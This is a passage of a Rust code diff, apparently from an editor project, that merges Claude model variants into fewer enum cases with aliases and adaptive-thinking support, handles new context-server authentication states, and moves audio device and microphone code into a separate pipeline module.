- ClaudeSonnet4_6_1mContext,
- #[serde(
- rename = "claude-sonnet-4-6-1m-context-thinking",
+ rename = "claude-sonnet-4-6",
+ alias = "claude-sonnet-4-6-latest",
+ alias = "claude-sonnet-4-6-1m-context",
+ alias = "claude-sonnet-4-6-1m-context-latest",
+ alias = "claude-sonnet-4-6-thinking",
+ alias = "claude-sonnet-4-6-thinking-latest",
+ alias = "claude-sonnet-4-6-1m-context-thinking",
alias = "claude-sonnet-4-6-1m-context-thinking-latest"
)]
- ClaudeSonnet4_6_1mContextThinking,
- #[serde(rename = "claude-haiku-4-5", alias = "claude-haiku-4-5-latest")]
- ClaudeHaiku4_5,
+ ClaudeSonnet4_6,
#[serde(
- rename = "claude-haiku-4-5-thinking",
+ rename = "claude-haiku-4-5",
+ alias = "claude-haiku-4-5-latest",
+ alias = "claude-haiku-4-5-thinking",
alias = "claude-haiku-4-5-thinking-latest"
)]
- ClaudeHaiku4_5Thinking,
+ ClaudeHaiku4_5,
#[serde(rename = "claude-3-haiku", alias = "claude-3-haiku-latest")]
Claude3Haiku,
#[serde(rename = "custom")]
@@ -171,38 +138,14 @@ impl Model {
}
pub fn from_id(id: &str) -> Result<Self> {
- if id.starts_with("claude-opus-4-6-1m-context-thinking") {
- return Ok(Self::ClaudeOpus4_6_1mContextThinking);
- }
-
- if id.starts_with("claude-opus-4-6-1m-context") {
- return Ok(Self::ClaudeOpus4_6_1mContext);
- }
-
- if id.starts_with("claude-opus-4-6-thinking") {
- return Ok(Self::ClaudeOpus4_6Thinking);
- }
-
if id.starts_with("claude-opus-4-6") {
return Ok(Self::ClaudeOpus4_6);
}
- if id.starts_with("claude-opus-4-5-thinking") {
- return Ok(Self::ClaudeOpus4_5Thinking);
- }
-
if id.starts_with("claude-opus-4-5") {
return Ok(Self::ClaudeOpus4_5);
}
- if id.starts_with("claude-opus-4-1-thinking") {
- return Ok(Self::ClaudeOpus4_1Thinking);
- }
-
- if id.starts_with("claude-opus-4-thinking") {
- return Ok(Self::ClaudeOpus4Thinking);
- }
-
if id.starts_with("claude-opus-4-1") {
return Ok(Self::ClaudeOpus4_1);
}
@@ -211,50 +154,22 @@ impl Model {
return Ok(Self::ClaudeOpus4);
}
- if id.starts_with("claude-sonnet-4-6-1m-context-thinking") {
- return Ok(Self::ClaudeSonnet4_6_1mContextThinking);
- }
-
- if id.starts_with("claude-sonnet-4-6-1m-context") {
- return Ok(Self::ClaudeSonnet4_6_1mContext);
- }
-
- if id.starts_with("claude-sonnet-4-6-thinking") {
- return Ok(Self::ClaudeSonnet4_6Thinking);
- }
-
if id.starts_with("claude-sonnet-4-6") {
return Ok(Self::ClaudeSonnet4_6);
}
- if id.starts_with("claude-sonnet-4-5-1m-context-thinking") {
- return Ok(Self::ClaudeSonnet4_5_1mContextThinking);
- }
-
if id.starts_with("claude-sonnet-4-5-1m-context") {
return Ok(Self::ClaudeSonnet4_5_1mContext);
}
- if id.starts_with("claude-sonnet-4-5-thinking") {
- return Ok(Self::ClaudeSonnet4_5Thinking);
- }
-
if id.starts_with("claude-sonnet-4-5") {
return Ok(Self::ClaudeSonnet4_5);
}
- if id.starts_with("claude-sonnet-4-thinking") {
- return Ok(Self::ClaudeSonnet4Thinking);
- }
-
if id.starts_with("claude-sonnet-4") {
return Ok(Self::ClaudeSonnet4);
}
- if id.starts_with("claude-haiku-4-5-thinking") {
- return Ok(Self::ClaudeHaiku4_5Thinking);
- }
-
if id.starts_with("claude-haiku-4-5") {
return Ok(Self::ClaudeHaiku4_5);
}
@@ -270,30 +185,13 @@ impl Model {
match self {
Self::ClaudeOpus4 => "claude-opus-4-latest",
Self::ClaudeOpus4_1 => "claude-opus-4-1-latest",
- Self::ClaudeOpus4Thinking => "claude-opus-4-thinking-latest",
- Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-thinking-latest",
Self::ClaudeOpus4_5 => "claude-opus-4-5-latest",
- Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-thinking-latest",
Self::ClaudeOpus4_6 => "claude-opus-4-6-latest",
- Self::ClaudeOpus4_6Thinking => "claude-opus-4-6-thinking-latest",
- Self::ClaudeOpus4_6_1mContext => "claude-opus-4-6-1m-context-latest",
- Self::ClaudeOpus4_6_1mContextThinking => "claude-opus-4-6-1m-context-thinking-latest",
Self::ClaudeSonnet4 => "claude-sonnet-4-latest",
- Self::ClaudeSonnet4Thinking => "claude-sonnet-4-thinking-latest",
Self::ClaudeSonnet4_5 => "claude-sonnet-4-5-latest",
- Self::ClaudeSonnet4_5Thinking => "claude-sonnet-4-5-thinking-latest",
Self::ClaudeSonnet4_5_1mContext => "claude-sonnet-4-5-1m-context-latest",
- Self::ClaudeSonnet4_5_1mContextThinking => {
- "claude-sonnet-4-5-1m-context-thinking-latest"
- }
Self::ClaudeSonnet4_6 => "claude-sonnet-4-6-latest",
- Self::ClaudeSonnet4_6Thinking => "claude-sonnet-4-6-thinking-latest",
- Self::ClaudeSonnet4_6_1mContext => "claude-sonnet-4-6-1m-context-latest",
- Self::ClaudeSonnet4_6_1mContextThinking => {
- "claude-sonnet-4-6-1m-context-thinking-latest"
- }
Self::ClaudeHaiku4_5 => "claude-haiku-4-5-latest",
- Self::ClaudeHaiku4_5Thinking => "claude-haiku-4-5-thinking-latest",
Self::Claude3Haiku => "claude-3-haiku-20240307",
Self::Custom { name, .. } => name,
}
@@ -302,23 +200,14 @@ impl Model {
/// The id of the model that should be used for making API requests
pub fn request_id(&self) -> &str {
match self {
- Self::ClaudeOpus4 | Self::ClaudeOpus4Thinking => "claude-opus-4-20250514",
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-20250805",
- Self::ClaudeOpus4_5 | Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-20251101",
- Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking => "claude-opus-4-6",
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => "claude-sonnet-4-20250514",
- Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking => "claude-sonnet-4-5-20250929",
- Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => "claude-sonnet-4-6",
- Self::ClaudeHaiku4_5 | Self::ClaudeHaiku4_5Thinking => "claude-haiku-4-5-20251001",
+ Self::ClaudeOpus4 => "claude-opus-4-20250514",
+ Self::ClaudeOpus4_1 => "claude-opus-4-1-20250805",
+ Self::ClaudeOpus4_5 => "claude-opus-4-5-20251101",
+ Self::ClaudeOpus4_6 => "claude-opus-4-6",
+ Self::ClaudeSonnet4 => "claude-sonnet-4-20250514",
+ Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5_1mContext => "claude-sonnet-4-5-20250929",
+ Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
+ Self::ClaudeHaiku4_5 => "claude-haiku-4-5-20251001",
Self::Claude3Haiku => "claude-3-haiku-20240307",
Self::Custom { name, .. } => name,
}
@@ -328,26 +217,13 @@ impl Model {
match self {
Self::ClaudeOpus4 => "Claude Opus 4",
Self::ClaudeOpus4_1 => "Claude Opus 4.1",
- Self::ClaudeOpus4Thinking => "Claude Opus 4 Thinking",
- Self::ClaudeOpus4_1Thinking => "Claude Opus 4.1 Thinking",
Self::ClaudeOpus4_5 => "Claude Opus 4.5",
- Self::ClaudeOpus4_5Thinking => "Claude Opus 4.5 Thinking",
Self::ClaudeOpus4_6 => "Claude Opus 4.6",
- Self::ClaudeOpus4_6Thinking => "Claude Opus 4.6 Thinking",
- Self::ClaudeOpus4_6_1mContext => "Claude Opus 4.6 (1M context)",
- Self::ClaudeOpus4_6_1mContextThinking => "Claude Opus 4.6 Thinking (1M context)",
Self::ClaudeSonnet4 => "Claude Sonnet 4",
- Self::ClaudeSonnet4Thinking => "Claude Sonnet 4 Thinking",
Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
- Self::ClaudeSonnet4_5Thinking => "Claude Sonnet 4.5 Thinking",
Self::ClaudeSonnet4_5_1mContext => "Claude Sonnet 4.5 (1M context)",
- Self::ClaudeSonnet4_5_1mContextThinking => "Claude Sonnet 4.5 Thinking (1M context)",
Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
- Self::ClaudeSonnet4_6Thinking => "Claude Sonnet 4.6 Thinking",
- Self::ClaudeSonnet4_6_1mContext => "Claude Sonnet 4.6 (1M context)",
- Self::ClaudeSonnet4_6_1mContextThinking => "Claude Sonnet 4.6 Thinking (1M context)",
Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
- Self::ClaudeHaiku4_5Thinking => "Claude Haiku 4.5 Thinking",
Self::Claude3Haiku => "Claude 3 Haiku",
Self::Custom {
name, display_name, ..
@@ -359,26 +235,13 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => Some(AnthropicModelCacheConfiguration {
min_total_token: 2_048,
should_speculate: true,
@@ -395,55 +258,28 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => 200_000,
- Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => 1_000_000,
+ Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_5_1mContext | Self::ClaudeSonnet4_6 => {
+ 1_000_000
+ }
Self::Custom { max_tokens, .. } => *max_tokens,
}
}
pub fn max_output_tokens(&self) -> u64 {
match self {
- Self::ClaudeOpus4
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking => 32_000,
+ Self::ClaudeOpus4 | Self::ClaudeOpus4_1 => 32_000,
Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
- | Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking => 64_000,
- Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking => 128_000,
+ | Self::ClaudeHaiku4_5 => 64_000,
+ Self::ClaudeOpus4_6 => 128_000,
Self::Claude3Haiku => 4_096,
Self::Custom {
max_output_tokens, ..
@@ -455,26 +291,13 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => 1.0,
Self::Custom {
default_temperature,
@@ -484,46 +307,41 @@ impl Model {
}
pub fn mode(&self) -> AnthropicModelMode {
- match self {
- Self::ClaudeOpus4
- | Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeSonnet4
- | Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeHaiku4_5
- | Self::Claude3Haiku => AnthropicModelMode::Default,
- Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4Thinking
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContextThinking
- | Self::ClaudeHaiku4_5Thinking => AnthropicModelMode::Thinking {
+ if self.supports_adaptive_thinking() {
+ AnthropicModelMode::AdaptiveThinking
+ } else if self.supports_thinking() {
+ AnthropicModelMode::Thinking {
budget_tokens: Some(4_096),
- },
- Self::Custom { mode, .. } => mode.clone(),
+ }
+ } else {
+ AnthropicModelMode::Default
}
}
+ pub fn supports_thinking(&self) -> bool {
+ matches!(
+ self,
+ Self::ClaudeOpus4
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_6
+ | Self::ClaudeSonnet4
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4_5_1mContext
+ | Self::ClaudeSonnet4_6
+ | Self::ClaudeHaiku4_5
+ )
+ }
+
+ pub fn supports_adaptive_thinking(&self) -> bool {
+ matches!(self, Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6)
+ }
+
pub fn beta_headers(&self) -> Option<String> {
let mut headers = vec![];
match self {
- Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => {
+ Self::ClaudeSonnet4_5_1mContext => {
headers.push(CONTEXT_1M_BETA_HEADER.to_string());
}
Self::Custom {
@@ -1219,7 +1219,7 @@ impl TextThread {
} => cx.emit(TextThreadEvent::Operation(
TextThreadOperation::BufferOperation(operation.clone()),
)),
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
self.count_remaining_tokens(cx);
self.reparse(cx);
cx.emit(TextThreadEvent::MessagesEdited);
@@ -901,14 +901,16 @@ impl TextThreadStore {
cx,
);
}
- ContextServerStatus::Stopped | ContextServerStatus::Error(_) => {
+ ContextServerStatus::Stopped
+ | ContextServerStatus::Error(_)
+ | ContextServerStatus::AuthRequired => {
if let Some(slash_command_ids) =
self.context_server_slash_command_ids.remove(server_id)
{
self.slash_commands.remove(&slash_command_ids);
}
}
- _ => {}
+ ContextServerStatus::Starting | ContextServerStatus::Authenticating => {}
}
}
@@ -14,7 +14,6 @@ doctest = false
[dependencies]
anyhow.workspace = true
-async-tar.workspace = true
collections.workspace = true
cpal.workspace = true
crossbeam.workspace = true
@@ -25,7 +24,6 @@ parking_lot.workspace = true
rodio.workspace = true
serde.workspace = true
settings.workspace = true
-smol.workspace = true
thiserror.workspace = true
util.workspace = true
@@ -1,77 +1,23 @@
-use anyhow::{Context as _, Result};
-use collections::HashMap;
-use cpal::{
- DeviceDescription, DeviceId, default_host,
- traits::{DeviceTrait, HostTrait},
-};
-use gpui::{App, AsyncApp, BackgroundExecutor, BorrowAppContext, Global};
+use std::time::Duration;
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-mod non_windows_and_freebsd_deps {
- pub(super) use cpal::Sample;
- pub(super) use libwebrtc::native::apm;
- pub(super) use parking_lot::Mutex;
- pub(super) use rodio::source::LimitSettings;
- pub(super) use std::sync::Arc;
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-use non_windows_and_freebsd_deps::*;
+use rodio::{ChannelCount, SampleRate, nz};
-use rodio::{
- Decoder, DeviceSinkBuilder, MixerDeviceSink, Source,
- mixer::Mixer,
- nz,
- source::{AutomaticGainControlSettings, Buffered},
-};
-use settings::Settings;
-use std::{io::Cursor, num::NonZero, path::PathBuf, sync::atomic::Ordering, time::Duration};
-use util::ResultExt;
+pub const REPLAY_DURATION: Duration = Duration::from_secs(30);
+pub const SAMPLE_RATE: SampleRate = nz!(48000);
+pub const CHANNEL_COUNT: ChannelCount = nz!(2);
mod audio_settings;
-mod replays;
-mod rodio_ext;
pub use audio_settings::AudioSettings;
-pub use rodio_ext::RodioExt;
+pub use audio_settings::LIVE_SETTINGS;
-use crate::audio_settings::LIVE_SETTINGS;
-
-// We are migrating to 16kHz sample rate from 48kHz. In the future
-// once we are reasonably sure most users have upgraded we will
-// remove the LEGACY parameters.
-//
-// We migrate to 16kHz because it is sufficient for speech and required
-// by the denoiser and future Speech to Text layers.
-pub const SAMPLE_RATE: NonZero<u32> = nz!(16000);
-pub const CHANNEL_COUNT: NonZero<u16> = nz!(1);
-pub const BUFFER_SIZE: usize = // echo canceller and livekit want 10ms of audio
- (SAMPLE_RATE.get() as usize / 100) * CHANNEL_COUNT.get() as usize;
-
-pub const LEGACY_SAMPLE_RATE: NonZero<u32> = nz!(48000);
-pub const LEGACY_CHANNEL_COUNT: NonZero<u16> = nz!(2);
-
-pub const REPLAY_DURATION: Duration = Duration::from_secs(30);
-
-pub fn init(cx: &mut App) {
- LIVE_SETTINGS.initialize(cx);
-}
-
-// TODO(jk): this is currently cached only once - we should observe and react instead
-pub fn ensure_devices_initialized(cx: &mut App) {
- if cx.has_global::<AvailableAudioDevices>() {
- return;
- }
- cx.default_global::<AvailableAudioDevices>();
- let task = cx
- .background_executor()
- .spawn(async move { get_available_audio_devices() });
- cx.spawn(async move |cx: &mut AsyncApp| {
- let devices = task.await;
- cx.update(|cx| cx.set_global(AvailableAudioDevices(devices)));
- cx.refresh();
- })
- .detach();
-}
+mod audio_pipeline;
+pub use audio_pipeline::Audio;
+pub use audio_pipeline::{AudioDeviceInfo, AvailableAudioDevices};
+pub use audio_pipeline::{ensure_devices_initialized, resolve_device};
+// TODO(audio) replace with input test functionality in the audio crate
+pub use audio_pipeline::RodioExt;
+pub use audio_pipeline::init;
+pub use audio_pipeline::{open_input_stream, open_test_output};
#[derive(Debug, Copy, Clone, Eq, Hash, PartialEq)]
pub enum Sound {
@@ -99,359 +45,3 @@ impl Sound {
}
}
}
-
-pub struct Audio {
- output_handle: Option<MixerDeviceSink>,
- #[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
- pub echo_canceller: Arc<Mutex<apm::AudioProcessingModule>>,
- source_cache: HashMap<Sound, Buffered<Decoder<Cursor<Vec<u8>>>>>,
- replays: replays::Replays,
-}
-
-impl Default for Audio {
- fn default() -> Self {
- Self {
- output_handle: Default::default(),
- #[cfg(not(any(
- all(target_os = "windows", target_env = "gnu"),
- target_os = "freebsd"
- )))]
- echo_canceller: Arc::new(Mutex::new(apm::AudioProcessingModule::new(
- true, false, false, false,
- ))),
- source_cache: Default::default(),
- replays: Default::default(),
- }
- }
-}
-
-impl Global for Audio {}
-
-impl Audio {
- fn ensure_output_exists(&mut self, output_audio_device: Option<DeviceId>) -> Result<&Mixer> {
- #[cfg(debug_assertions)]
- log::warn!(
- "Audio does not sound correct without optimizations. Use a release build to debug audio issues"
- );
-
- if self.output_handle.is_none() {
- let output_handle = open_output_stream(output_audio_device)?;
-
- // The webrtc apm is not yet compiling for windows & freebsd
- #[cfg(not(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- )))]
- let echo_canceller = Arc::clone(&self.echo_canceller);
-
- #[cfg(not(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- )))]
- {
- let source = rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE)
- .inspect_buffer::<BUFFER_SIZE, _>(move |buffer| {
- let mut buf: [i16; _] = buffer.map(|s| s.to_sample());
- echo_canceller
- .lock()
- .process_reverse_stream(
- &mut buf,
- SAMPLE_RATE.get() as i32,
- CHANNEL_COUNT.get().into(),
- )
- .expect("Audio input and output threads should not panic");
- });
- output_handle.mixer().add(source);
- }
-
- #[cfg(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- ))]
- {
- let source = rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE);
- output_handle.mixer().add(source);
- }
-
- self.output_handle = Some(output_handle);
- }
-
- Ok(self
- .output_handle
- .as_ref()
- .map(|h| h.mixer())
- .expect("we only get here if opening the outputstream succeeded"))
- }
-
- pub fn save_replays(
- &self,
- executor: BackgroundExecutor,
- ) -> gpui::Task<anyhow::Result<(PathBuf, Duration)>> {
- self.replays.replays_to_tar(executor)
- }
-
- #[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
- pub fn open_microphone(voip_parts: VoipParts) -> anyhow::Result<impl Source> {
- let stream = open_input_stream(voip_parts.input_audio_device)?;
- let stream = stream
- .possibly_disconnected_channels_to_mono()
- .constant_samplerate(SAMPLE_RATE)
- .limit(LimitSettings::live_performance())
- .process_buffer::<BUFFER_SIZE, _>(move |buffer| {
- let mut int_buffer: [i16; _] = buffer.map(|s| s.to_sample());
- if voip_parts
- .echo_canceller
- .lock()
- .process_stream(
- &mut int_buffer,
- SAMPLE_RATE.get() as i32,
- CHANNEL_COUNT.get() as i32,
- )
- .context("livekit audio processor error")
- .log_err()
- .is_some()
- {
- for (sample, processed) in buffer.iter_mut().zip(&int_buffer) {
- *sample = (*processed).to_sample();
- }
- }
- })
- .denoise()
- .context("Could not set up denoiser")?
- .automatic_gain_control(AutomaticGainControlSettings {
- target_level: 0.90,
- attack_time: Duration::from_secs(1),
- release_time: Duration::from_secs(0),
- absolute_max_gain: 5.0,
- })
- .periodic_access(Duration::from_millis(100), move |agc_source| {
- agc_source
- .set_enabled(LIVE_SETTINGS.auto_microphone_volume.load(Ordering::Relaxed));
- let denoise = agc_source.inner_mut();
- denoise.set_enabled(LIVE_SETTINGS.denoise.load(Ordering::Relaxed));
- });
-
- let stream = if voip_parts.legacy_audio_compatible {
- stream.constant_params(LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE)
- } else {
- stream.constant_params(CHANNEL_COUNT, SAMPLE_RATE)
- };
-
- let (replay, stream) = stream.replayable(REPLAY_DURATION)?;
- voip_parts
- .replays
- .add_voip_stream("local microphone".to_string(), replay);
-
- Ok(stream)
- }
-
- pub fn play_voip_stream(
- source: impl rodio::Source + Send + 'static,
- speaker_name: String,
- is_staff: bool,
- cx: &mut App,
- ) -> anyhow::Result<()> {
- let (replay_source, source) = source
- .constant_params(CHANNEL_COUNT, SAMPLE_RATE)
- .automatic_gain_control(AutomaticGainControlSettings {
- target_level: 0.90,
- attack_time: Duration::from_secs(1),
- release_time: Duration::from_secs(0),
- absolute_max_gain: 5.0,
- })
- .periodic_access(Duration::from_millis(100), move |agc_source| {
- agc_source.set_enabled(LIVE_SETTINGS.auto_speaker_volume.load(Ordering::Relaxed));
- })
- .replayable(REPLAY_DURATION)
- .expect("REPLAY_DURATION is longer than 100ms");
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
-
- cx.update_default_global(|this: &mut Self, _cx| {
- let output_mixer = this
- .ensure_output_exists(output_audio_device)
- .context("Could not get output mixer")?;
- output_mixer.add(source);
- if is_staff {
- this.replays.add_voip_stream(speaker_name, replay_source);
- }
- Ok(())
- })
- }
-
- pub fn play_sound(sound: Sound, cx: &mut App) {
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
- cx.update_default_global(|this: &mut Self, cx| {
- let source = this.sound_source(sound, cx).log_err()?;
- let output_mixer = this
- .ensure_output_exists(output_audio_device)
- .context("Could not get output mixer")
- .log_err()?;
-
- output_mixer.add(source);
- Some(())
- });
- }
-
- pub fn end_call(cx: &mut App) {
- cx.update_default_global(|this: &mut Self, _cx| {
- this.output_handle.take();
- });
- }
-
- fn sound_source(&mut self, sound: Sound, cx: &App) -> Result<impl Source + use<>> {
- if let Some(wav) = self.source_cache.get(&sound) {
- return Ok(wav.clone());
- }
-
- let path = format!("sounds/{}.wav", sound.file());
- let bytes = cx
- .asset_source()
- .load(&path)?
- .map(anyhow::Ok)
- .with_context(|| format!("No asset available for path {path}"))??
- .into_owned();
- let cursor = Cursor::new(bytes);
- let source = Decoder::new(cursor)?.buffered();
-
- self.source_cache.insert(sound, source.clone());
-
- Ok(source)
- }
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-pub struct VoipParts {
- echo_canceller: Arc<Mutex<apm::AudioProcessingModule>>,
- replays: replays::Replays,
- legacy_audio_compatible: bool,
- input_audio_device: Option<DeviceId>,
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-impl VoipParts {
- pub fn new(cx: &AsyncApp) -> anyhow::Result<Self> {
- let (apm, replays) = cx.read_default_global::<Audio, _>(|audio, _| {
- (Arc::clone(&audio.echo_canceller), audio.replays.clone())
- });
- let legacy_audio_compatible =
- AudioSettings::try_read_global(cx, |settings| settings.legacy_audio_compatible)
- .unwrap_or(true);
- let input_audio_device =
- AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone())
- .flatten();
-
- Ok(Self {
- legacy_audio_compatible,
- echo_canceller: apm,
- replays,
- input_audio_device,
- })
- }
-}
-
-pub fn open_input_stream(
- device_id: Option<DeviceId>,
-) -> anyhow::Result<rodio::microphone::Microphone> {
- let builder = rodio::microphone::MicrophoneBuilder::new();
- let builder = if let Some(id) = device_id {
- // TODO(jk): upstream patch
- // if let Some(input_device) = default_host().device_by_id(id) {
- // builder.device(input_device);
- // }
- let mut found = None;
- for input in rodio::microphone::available_inputs()? {
- if input.clone().into_inner().id()? == id {
- found = Some(builder.device(input));
- break;
- }
- }
- found.unwrap_or_else(|| builder.default_device())?
- } else {
- builder.default_device()?
- };
- let stream = builder
- .default_config()?
- .prefer_sample_rates([
- SAMPLE_RATE,
- SAMPLE_RATE.saturating_mul(rodio::nz!(2)),
- SAMPLE_RATE.saturating_mul(rodio::nz!(3)),
- SAMPLE_RATE.saturating_mul(rodio::nz!(4)),
- ])
- .prefer_channel_counts([rodio::nz!(1), rodio::nz!(2), rodio::nz!(3), rodio::nz!(4)])
- .prefer_buffer_sizes(512..)
- .open_stream()?;
- log::info!("Opened microphone: {:?}", stream.config());
- Ok(stream)
-}
-
-pub fn resolve_device(device_id: Option<&DeviceId>, input: bool) -> anyhow::Result<cpal::Device> {
- if let Some(id) = device_id {
- if let Some(device) = default_host().device_by_id(id) {
- return Ok(device);
- }
- log::warn!("Selected audio device not found, falling back to default");
- }
- if input {
- default_host()
- .default_input_device()
- .context("no audio input device available")
- } else {
- default_host()
- .default_output_device()
- .context("no audio output device available")
- }
-}
-
-pub fn open_output_stream(device_id: Option<DeviceId>) -> anyhow::Result<MixerDeviceSink> {
- let device = resolve_device(device_id.as_ref(), false)?;
- let mut output_handle = DeviceSinkBuilder::from_device(device)?
- .open_stream()
- .context("Could not open output stream")?;
- output_handle.log_on_drop(false);
- log::info!("Output stream: {:?}", output_handle);
- Ok(output_handle)
-}
-
-#[derive(Clone, Debug)]
-pub struct AudioDeviceInfo {
- pub id: DeviceId,
- pub desc: DeviceDescription,
-}
-
-impl AudioDeviceInfo {
- pub fn matches_input(&self, is_input: bool) -> bool {
- if is_input {
- self.desc.supports_input()
- } else {
- self.desc.supports_output()
- }
- }
-
- pub fn matches(&self, id: &DeviceId, is_input: bool) -> bool {
- &self.id == id && self.matches_input(is_input)
- }
-}
-
-impl std::fmt::Display for AudioDeviceInfo {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
- write!(f, "{} ({})", self.desc.name(), self.id)
- }
-}
-
-fn get_available_audio_devices() -> Vec<AudioDeviceInfo> {
